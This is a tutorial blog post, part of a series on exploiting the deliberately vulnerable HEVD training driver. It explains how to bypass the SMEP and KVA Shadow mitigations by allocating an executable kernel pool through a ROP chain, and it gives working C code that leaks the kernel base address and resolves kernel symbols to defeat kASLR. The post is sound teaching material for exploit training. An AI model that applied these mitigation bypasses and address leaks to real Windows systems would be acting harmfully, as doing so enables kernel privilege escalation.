[Cracking Windows Kernel with HEVD] Chapter 2: Is there a way to bypass kASLR, SMEP and KVA Shadow?
Cracking HackSys Extreme Vulnerable Driver: Is there a way to bypass kASLR, SMEP and KVA Shadow?
Where to redirect the execution flow?
On the previous post, we wrote a program that would crash our driver and leave us with a BSOD. We managed to discover the return address offset and redirect the program flow to an arbitrary address. But we were left with a question: what now? Where to redirect the execution flow?
The first naive approach that would come to mind is to create a userland function in our exploit and redirect the control flow to that function. This approach was fine until Windows 7 SP1 launched (I believe it was on Windows 7 SPI, but I might be mistaken on this one. Could not find sources on the Internet to back this up). However, from this point onwards Supervisor Mode Execution Prevention was enabled in processor which has support for it.
WTF is Supervisor Mode Execition Prevention?
Ok, but first what is supervisor mode anyways?
Supervisor mode is an execution mode which enables all instructions, including privileged ones. It gives access to different address spaces, memory management hardware and other peripherals. This is the mode in which the kernel, and its drivers, run. It is basically a “god mode” in which the kernel runs, but not userland programs.
So the Supervisor Mode Execution Prevention is a mitigation that will not permit certain regions of memory (such as userland memory) to be executed in supervisor mode. In terms of our exploit, if we redirect the execution flow to our program in userland, it will raise a trap and you will immediately get a BSOD.
This mitigation can be disabled (almost trivially on Windows, if I might say so) by setting the 20th bit of CR4 register to zero. This can be achieved in kernel land with a ROP chain. In this case, we can bypass SMEP by using a ROP chain, for instance.
We can also bypass SMEP by never going to userland in the first place. We can use ROP gadgets in the kernel to perform elevation of privileges or write our shellcode to a memory region in the kernel which is both executable and writable. This approach is usually harder than the former.
In this case, we should go with the easier approach and ROP our way to disable the SMEP bit on the CR4 register, right?
Well, we could try. But nowadays there is another mitigation in place that will make this bypass useless.
SMEP was our only hope. No, there is another.
There is another mitigation called Kernel Page-Table Isolation (KPTI), or, as Windows calls it, Kernel Virtual Address (KVA) Shadow. It was actually created to mitigate Meltdown vulnerabilities by isolating kernel page tables from user page tables. However, it also creates another problem: when executing kernel code, it marks user page tables as non-executable (NX). This breaks down our easy approach to just disable SMEP by ropping.
Now we can either mark user pages as executable again or use a writable and executable kernel page to store our shellcode. The latter approach will be used here.
With this approach, we don’t have to be concerned about SMEP at all, as we will just avoid it. But this raises yet another question: is there such a place in kernel where we can write our shellcode and execute it?
Allocating an executable pool
Driver developers can allocate different types of memory pools. The two most basic types are PagedPool and NonPagedPool types. The former allocated a non-executable pageable memory pool for use, whereas the latter allocates non-pageable pool which, by default, is executable. The allocation can be performed by calling ExAllocatePoolWithTag() function with the desired parameters.
We shall use this function to allocate an executable NonPagedPool. Then we write our shellcode to this allocated region and execute it. Finally, we restore enough registers so the system can return to userland gracefully and that’s a wrap.
The ExAllocatePoolWithTag()
has the following prototype:
PVOID ExAllocatePoolWithTag(
[in] __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
[in] SIZE_T NumberOfBytes,
[in] ULONG Tag
);
The first parameter is the pool type, which is zero (NonPagedPool), as can be checked in the official Microsoft documentation. The second parameter is the size, which we can just use 4096 bytes. Finally, the Tag parameter is just for debugging purposes. We can put whatever we want in it.
It will return the address of the allocated pool.
According to Microsoft documentation, the call convention dictates that the first parameter is given in rcx
register, the second in rdx
and the third in r8
. We shall ROP our way to set up rcx
to zero, rdx
to 4096 and call this function. The address allocated will be returned in rax
register, as it is also dictated by the call convention.
After it is allocated, we can use RtlCopyMemory
to copy our shellcode from userland to the executable address in the kernel land. Finally, we can use some gadget, such as jmp rax
to redirect the execution flow.
Once again, this approach raises another problem. We must have the address of ExAllocatePoolWithTag
and RtlCopyMemory
(or an analogue memory copy function) to know where to redirect our flow. We could get the address for these functions in ntoskrnl.exe (which is actually the kernel binary), but the imagebase is changed upon each reboot. This means that on every reboot, every kernel function will be added to an offset, the imagebase offset, making the addresses unpredictable. Our approach will rely on getting the addresses for the desired functions (and eventual gadgets) in the ntoskrnl.exe binary and somehow leak the imagebase address to defeat the protection.
Defeating the randomized imagebase
This sounds like a really hard problem to solve that would rely on leaking a kernel address and then try to guess the imagebase with that. And this problem is usually hard to solve. But Windows makes it easier for us!
For processes running with medium integrity level (which is the default level when you open applications), there are Windows APIs which will give that away for free. Microsoft even gives us an example of how to implement this.
The EnumDeviceDrivers
function, present on psapi.h
, will enumerate all device drivers, including the kernel itself, and give us the base address for the device driver. It will return a list of device drivers, the first of which being the kernel itself. The implementation is very simple:
#include <Windows.h>
#include <Psapi.h>
...
unsigned long long get_kernel_base_addr() {
LPVOID drivers[1024];
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return (unsigned long long)drivers[0];
}
There we go! The randomized imagebase is now defeated.
It is also useful to be able to get any kernel function address by the function name. This is done by opening the kernel binary as a library and looking up the address for the desired symbol. The implementation is very straightforward as well:
PVOID get_kernel_symbol_addr(const char *symbol) {
PVOID kernelBaseAddr;
HMODULE userKernelHandle;
PCHAR functionAddress;
unsigned long long offset;
kernelBaseAddr = (PVOID)get_kernel_base_addr(); // Get base address from our previously implemented function
userKernelHandle = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe"); // Loads the kernel binary as a lib
if (userKernelHandle == INVALID_HANDLE_VALUE) {
// Something went wrong
return NULL;
}
functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol); // Finds the address of the specified symbol
if (functionAddress == NULL) {
// Something went wrong
return NULL;
}
offset = functionAddress - ((PCHAR)userKernelHandle); // Subtracts the address found for the symbol to the base address of the lib loaded in the process memory
return (PVOID)(((PCHAR)kernelBaseAddr) + offset); // Adds the offset of the leaked kernel base address
}
With the function above, we can query the address of any kernel function. Neat!
I am afraid that is as far as we are going to get today, folks. On the next post we will craft our ROP payload. See you then!